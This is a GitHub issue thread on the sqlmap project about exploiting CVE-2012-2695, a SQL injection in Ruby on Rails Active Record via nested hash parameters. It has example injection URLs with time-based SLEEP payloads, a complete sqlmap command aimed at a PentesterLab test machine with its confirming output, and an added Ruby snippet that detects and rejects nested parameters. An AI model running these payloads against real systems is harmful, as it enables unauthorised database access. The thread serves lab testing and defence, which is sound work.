sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

CVE-2012-2695 support (Ruby on Rails Active Record SQL Injection) #1239

Closed Ogglas closed 9 years ago

Ogglas commented 9 years ago

Is there anyway to use sqlmap to find this vulnerability?

"The Active Record component in Ruby on Rails before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not properly implement the passing of request data to a where method in an ActiveRecord class, which allows remote attackers to conduct certain SQL injection attacks via nested query parameters that leverage improper handling of nested hashes, a related issue to CVE-2012-2661."

Example CVE-2012-2661:

Request: controller?id=123
Query: SELECT `posts`.* FROM `posts` WHERE `posts`.`id` = '123'

Request: controller?id[table.column]=123
Query: SELECT `posts`.* FROM `posts` WHERE `table`.`column` = '123'

Examples CVE-2012-2695: 1)

Request: controller?id=123
Query: SELECT `posts`.* FROM `posts` WHERE `posts`.`id` = '123'

Request: controller?id[table][column]=123
Query: SELECT `posts`.* FROM `posts` WHERE `table`.`column` = '123'

2)

Request: controller?id=123
Query: SELECT `posts`.* FROM `posts` WHERE `posts`.`id` = '123'

Request: controller?id[mysql%20where%20(select%200)%20or%20sleep(1).xxx][yyy]=123
Queries:

SHOW TABLES
SHOW TABLES IN mysql where (select 0) or sleep(1)
(...)
SELECT `posts`.* FROM `posts` WHERE `mysql where (select 0) or sleep(1).xxx`.`yyy` = '123'

http://www.cvedetails.com/cve/CVE-2012-2695/
http://blog.conviso.com.br/2012/06/ruby-on-rails-sql-injection-cve-2012_15.html
http://seclists.org/oss-sec/2012/q2/504
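As an added example (not code from the thread or from the sqlmap project), a plain-Ruby check for the request shape described above: a parameter the application expects as a scalar (?id=123) arriving as a nested hash (?id[table][column]=123), plus the coercion an application should apply before handing the value to where(). The function names and the list of "scalar" parameters are assumptions for the example.

```ruby
require "uri"

# Split a Rails-style key such as "id[table][column]" into
# ["id", "table", "column"]; a plain key "id" becomes ["id"].
def split_param_key(key)
  m = key.match(/\A([^\[]+)(.*)\z/)
  return [key] unless m
  base, rest = m.captures
  [base] + rest.scan(/\[([^\]]*)\]/).flatten
end

# Decode a query string (percent-encoding included) into one entry per
# pair: the top-level parameter name, its nested path, and the value.
def parse_query(query)
  URI.decode_www_form(query).map do |key, value|
    path = split_param_key(key)
    { base: path.first, nesting: path.drop(1), value: value }
  end
end

# Detection: any parameter listed in scalar_params that arrives with a
# nested path would have become a Hash in params and, on Rails < 3.2.6,
# an attacker-chosen `table`.`column` reference inside where().
def find_nested_scalar_params(query, scalar_params)
  parse_query(query).select do |p|
    scalar_params.include?(p[:base]) && !p[:nesting].empty?
  end
end

# Mitigation: refuse any nested form of "id" and coerce the value to an
# Integer, so only a numeric literal ever reaches the query.
def safe_id(query)
  entries = parse_query(query).select { |p| p[:base] == "id" }
  raise ArgumentError, "id missing" if entries.empty?
  raise ArgumentError, "id must be a scalar" if entries.any? { |p| !p[:nesting].empty? }
  Integer(entries.first[:value], 10)
end
```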

omarkurt commented 9 years ago

Hi, Ogglas.

Do you have an online test case / written case?

Ogglas commented 9 years ago

No I do not have that at the moment.

Ogglas commented 9 years ago

Similar environment (CVE-2012-2661) available here though:

https://pentesterlab.com/exercises/cve-2012-2661

omarkurt commented 9 years ago

Hmm, okay Ogglas. Thanks for the help.

stamparm commented 9 years ago

It goes like this. This would require rewriting sqlmap's engine to support automatic injection into the parameter names (note: sqlmap can do this if the user manually puts the injection marker * there). This would introduce twice as many requests (1 set for parameter names and 1 set for parameter values). After the required update, this (automatic approach) would be feasible out of the box.

Now, as this is currently an old(-ish) vulnerability, I am voting for leaving details here on how to exploit it in sqlmap (if the user knows that the vulnerability is there or suspects it) rather than messing with the code and introducing twice as many test requests.

stamparm commented 9 years ago

More info about the vulnerability and how to exploit it: https://pentesterlab.com/exercises/cve-2012-2661/course

Original URI (testing environment using ISO from https://pentesterlab.com/exercises/cve-2012-2661): http://192.168.146.133/?id=1

sqlmap run: python sqlmap.py -u "http://192.168.146.133/?id[information_schema%20WHERE%201%3D1*%20%3B%20--%20.user][1]=1" --eval='import time;uri=uri.replace("user]", "user%d]" % time.time())' --level=3 --risk=3 --time-sec=1

...

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 129 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://192.168.146.133:80/?id[information_schema WHERE 1=1 AND SLEEP(1) ; -- .user][1]=1
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[11:19:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache 2.2.16
back-end DBMS: MySQL 5.0.12

p.s. due to the nature of this vulnerability, the SLEEP statement is run multiple times (i.e. 1 delayed subquery per table in the information_schema database, because of the affected SHOW TABLES statement), so expect VERY SLOW data retrieval